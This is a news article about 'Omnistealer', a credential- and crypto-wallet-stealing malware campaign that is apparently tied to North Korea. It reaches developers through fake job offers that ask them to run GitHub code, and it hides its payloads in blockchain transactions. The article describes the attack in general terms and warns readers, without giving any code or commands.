kWhat began as a seemingly routine freelance opportunity quickly unraveled into a major cybersecurity discovery. Last year, the vice president of engineering at blockchain analytics firm Crystal Intelligence received a LinkedIn message offering web development work. Suspicious of the approach—given the rise of scams tied to fake job offers—he investigated further and uncovered something alarming.
The assignment required running code hosted on GitHub. On closer inspection, the code concealed the early stages of a sophisticated cyberattack. Designed to appear harmless, it could easily deceive developers into executing it as part of routine contract work.
Once activated, the code connects to blockchain networks such as TRON and Aptos, extracting data that points toward the Binance Smart Chain. From there, an additional payload is retrieved. According to Nick Smart, Crystal Intelligence’s chief intelligence officer, this final stage “fetches the final form—malicious code,” enabling extensive data theft from infected systems.
Cybersecurity experts at Ransom-ISAC, a collaborative group of global researchers, have named this malware “Omnistealer.” Its capabilities are vast. “It literally steals everything,” said Ellis Stannard, a core member of the group. Their analysis revealed compatibility with over 60 cryptocurrency wallets, including MetaMask and Coinbase, as well as numerous password managers like LastPass, popular browsers such as Chrome and Firefox, and cloud platforms including Google Drive. Beyond cryptocurrency, the malware can extract sensitive credentials and access permissions.
Initially resembling a typical phishing scheme, the operation turned out to be far more dangerous. By embedding malicious code in blockchain transactions—where data is permanent and difficult to remove—attackers have created a persistent and scalable threat. Researchers warn that once deployed, the malware does not distinguish between personal and corporate data, putting both individuals and organizations at risk.
Investigators say the scale of the attack could surpass that of WannaCry, the global ransomware outbreak that impacted over 200,000 computers in 2017. So far, approximately 300,000 compromised credentials have been linked to this campaign, though experts believe this figure may represent only a fraction of the total.
Further analysis traced parts of the operation to suspicious IP addresses, including one linked to a former U.S. consulate site in Vladivostok, Russia—previously associated with North Korean cyber activities. Smart noted the financial scale of the operation, explaining that hackers leveraging this method have accumulated millions in cryptocurrency.
Researchers also discovered that elements of the malicious code had been quietly embedded in blockchain transactions years before being activated, functioning like dormant digital triggers. “Hiding malicious payloads within blockchain has become an emerging obfuscation technique,” reads a blog post written by collaborators at Ransom-ISAC.
The attack primarily targets software developers and contractors. Hackers pose either as recruiters offering jobs or as freelancers seeking employment. In both cases, they exploit trust to gain access to systems or credentials. Victims have included organizations across various sectors, from financial services and defense to technology and even food delivery businesses.
“Since this case, I haven't been able to look at GitHub the same way,” Stannard said, reflecting on how attackers embed malicious code into legitimate-looking repositories.
Evidence increasingly points to involvement by North Korean state-backed groups. Infrastructure, malware patterns, and cryptocurrency wallets used in the campaign overlap with known operations linked to such actors. Some wallets have even been tied to previous large-scale cyber thefts.
Experts suggest multiple possible motives, including financial gain, credential harvesting for identity fabrication, or enabling covert access to targeted organizations. “Everything about this has DPRK written all over it,” Stannard said, emphasizing the organized and strategic nature of the operation.
The FBI has acknowledged awareness of such tactics, stating: “This technique highlights the continuing evolution of the DPRK's ability to exploit the web3 space.”
Adding another layer of mystery, investigators uncovered unusual files hidden alongside the malware, including audio clips, images, and even technical documents. While their purpose remains unclear, researchers speculate these may represent experiments in covert data storage or communication.
As blockchain adoption grows, experts warn that such techniques will likely become more common. The combination of low-cost execution, permanence of blockchain data, and increasingly accessible coding tools—including AI—makes these attacks easier to replicate and harder to eliminate.
Authorities have been notified, but with investigations ongoing, many questions remain unanswered. For now, cybersecurity professionals urge caution—especially when dealing with unfamiliar code or unsolicited job offers, even from seemingly trusted platforms.
